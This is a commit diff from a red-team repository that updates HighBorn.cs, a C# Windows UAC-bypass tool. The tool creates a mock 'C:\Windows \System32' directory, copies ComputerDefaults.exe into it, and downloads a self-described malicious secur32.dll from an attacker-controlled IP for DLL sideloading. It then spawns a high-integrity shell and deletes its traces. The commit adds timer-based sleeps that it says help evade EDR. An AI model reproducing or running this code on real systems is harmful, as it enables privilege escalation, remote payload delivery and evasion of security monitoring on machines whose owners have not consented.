Halaman utama Jelajahi Bantuan
Masuk
zhensolid
/
Home-Grown-Red-Team
1
0
Fork 0
Berkas Masalah 0 Permintaan Tarik 0 Wiki
Jelajahi Sumber

Update HighBorn.cs

Added a sleep function which seems to help with EDR evasion.
assume-breach 2 tahun lalu
induk
4b180b8490
melakukan
cdace5f80a
1 mengubah file dengan 61 tambahan dan 36 penghapusan
Tampilan Split Tampilkan Statistik Diff
  1. 61 36
      HighBorn/HighBorn.cs

+ 61 - 36
HighBorn/HighBorn.cs
Tampilan Berkas 

@@ -4,8 +4,6 @@ using System.Runtime.InteropServices;
 
 using System.Diagnostics;
 
 using System.Net;
 
 
-
 
-
 
 namespace HighBorn
 
 {
 
     class HighBorn
 
@@ -25,12 +23,31 @@ namespace HighBorn
 
         [DllImport("kernel32.dll", SetLastError = true)]
 
         [return: MarshalAs(UnmanagedType.Bool)]
 
         static extern bool DeleteFileW([MarshalAs(UnmanagedType.LPWStr)]string lpFileName);
 
-       
-	    [DllImport("kernel32.dll", SetLastError = true)]
 
+
 
+        [DllImport("kernel32.dll", SetLastError = true)]
 
         static extern bool RemoveDirectory(string lpPathName);
 
 
-		
-	
+        [DllImport("ntdll.dll")]
 
+        public static extern int NtDelayExecution(bool Alertable, ref long DelayInterval);
 
+
 
+        [DllImport("ntdll.dll")]
 
+        public static extern int ZwSetTimerResolution(uint RequestedResolution, bool Set, out uint ActualResolution);
 
+
 
+        private static bool isResolutionSet = false;
 
+
 
+        static void SleepShort(float milliseconds)
 
+        {
 
+            if (!isResolutionSet)
 
+            {
 
+                uint actualResolution;
 
+                ZwSetTimerResolution(1, true, out actualResolution);
 
+                isResolutionSet = true;
 
+            }
 
+
 
+            long interval = (long)(-1 * milliseconds * 10000.0f); // Convert to 100-nanosecond intervals
 
+            NtDelayExecution(false, ref interval);
 
+        }
 
+
 
         public static void Main(string[] args)
 
         {
 
             IntPtr wow64Value = IntPtr.Zero;
 
@@ -47,13 +64,14 @@ namespace HighBorn
 
             {
 
                 Console.WriteLine("[-] Unable to create directories");
 
             }
 
-			
-			
-			Console.WriteLine("[^] Copying Executable Into Mock Directory");
 
+
 
+            SleepShort(2000); // Sleep for 2 seconds
 
+
 
+            Console.WriteLine("[^] Copying Executable Into Mock Directory");
 
             try
 
             {
 
-            
-			CopyFile(@"C:\Windows\System32\ComputerDefaults.exe", @"C:\Windows \System32\ComputerDefaults.exe", true);
 
+
 
+                CopyFile(@"C:\Windows\System32\ComputerDefaults.exe", @"C:\Windows \System32\ComputerDefaults.exe", true);
 
 
             }
 
             catch
 
@@ -61,40 +79,47 @@ namespace HighBorn
 
                 Console.WriteLine("[-] Unable to create the mock directories");
 
             }
 
 
-			Console.WriteLine("[^] Downloading Malicious DLL");
 
+            SleepShort(2000); // Sleep for 2 seconds
 
+
 
+            Console.WriteLine("[^] Downloading Malicious DLL");
 
             try
 
-			{
 
-			using (WebClient webClient = new WebClient())
 
-				{
 
-					webClient.DownloadFile("http://172.16.202.178:9090/secur32.dll", @"C:\Windows\temp\secur32.dll");
 
-				}
 
-			}
 
-			catch
 
-			{
 
-				Console.WriteLine("[^] DLL Downloaded");
 
-			}	
-			
-			CopyFile(@"C:\Windows\temp\secur32.dll", @"C:\Windows \System32\secur32.dll", true);
 
-			
-			Console.WriteLine("[^] Spawining High Integrity Shell");
 
+            {
 
+                using (WebClient webClient = new WebClient())
 
+                {
 
+                    webClient.DownloadFile("http://IP:PORT/secur32.dll", @"C:\Windows\temp\secur32.dll");
 
+                }
 
+            }
 
+            catch
 
+            {
 
+                Console.WriteLine("[^] DLL Downloaded");
 
+            }
 
+
 
+            CopyFile(@"C:\Windows\temp\secur32.dll", @"C:\Windows \System32\secur32.dll", true);
 
+
 
+            SleepShort(2000); // Sleep for 2 seconds
 
+
 
+            Console.WriteLine("[^] Spawning High Integrity Shell");
 
             try
 
             {
 
-            		Process.Start(@"C:\Windows \System32\ComputerDefaults.exe").WaitForExit();
 
+                Process.Start(@"C:\Windows \System32\ComputerDefaults.exe").WaitForExit();
 
             }
 
             catch
 
             {
 
-                Console.WriteLine("[-] Shell fucked up");
 
+                Console.WriteLine("[-] Shell messed up");
 
             }
 
 
+            SleepShort(2000); // Sleep for 2 seconds
 
+
 
             Console.WriteLine("[^] Cleaning Up");
 
-		
-            	DeleteFileW(@"C:\Windows\temp\secur32.dll");
 
-        	DeleteFileW(@"C:\Windows \System32\ComputerDefaults.exe");
 
-		DeleteFileW(@"C:\Windows \System32\secur32.dll");
 
-		RemoveDirectory(@"C:\Windows \System32\");
 
-		RemoveDirectory(@"C:\Windows \");
 
-
 
-            
+
 
+            DeleteFileW(@"C:\Windows\temp\secur32.dll");
 
+	    SleepShort(2000);
 
+            DeleteFileW(@"C:\Windows \System32\ComputerDefaults.exe");
 
+            SleepShort(2000);
 
+	    DeleteFileW(@"C:\Windows \System32\secur32.dll");
 
+            RemoveDirectory(@"C:\Windows \System32\");
 
+            RemoveDirectory(@"C:\Windows \");
 
+
 
             Wow64RevertWow64FsRedirection(wow64Value);
 
         }
 
     }